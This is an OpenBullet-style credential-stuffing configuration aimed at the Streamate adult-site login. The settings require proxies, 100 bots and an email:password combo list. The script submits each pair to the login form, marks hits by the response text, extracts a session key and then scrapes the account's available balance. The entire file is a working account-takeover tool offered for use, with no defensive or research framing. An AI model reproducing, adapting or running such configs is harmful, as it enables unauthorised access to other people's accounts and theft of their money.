[SETTINGS]
{
  "CreatorLK": "OB-2ce8f1c4a87b07e3a17097e472a75359-LoliKEY",
  "Name": "Streamate",
  "SuggestedBots": 100,
  "LastModified": "2019-04-14T00:49:03.7426118+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Lucky",
  "Version": "1.2.2.0",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.streamate.com/login.php" 
  CONTENT "trylogin=1&tz_offset_minutes=-120&tries=1&g=Lz9sYW5nY2hvaWNlPWVu&pagenum=1&sausr=<USER>&sapwd=<PASS>&recognize=1" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "Either the email address or your password is incorrect" 
  KEYCHAIN Success OR 
    KEY "<ADDRESS>" Contains "sakey" 

PARSE "<ADDRESS>" LR "?langchoice=en&sakey=" "&login_type=direct_login" -> VAR "sakey" 

REQUEST GET "https://www.streamate.com/mymanage.php?sakey=<sakey>&selectedSection=cinfo#js-limits" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<li><strong>Available:</strong>&nbsp;&#36;" "</li>" -> CAP "Available Balance" 

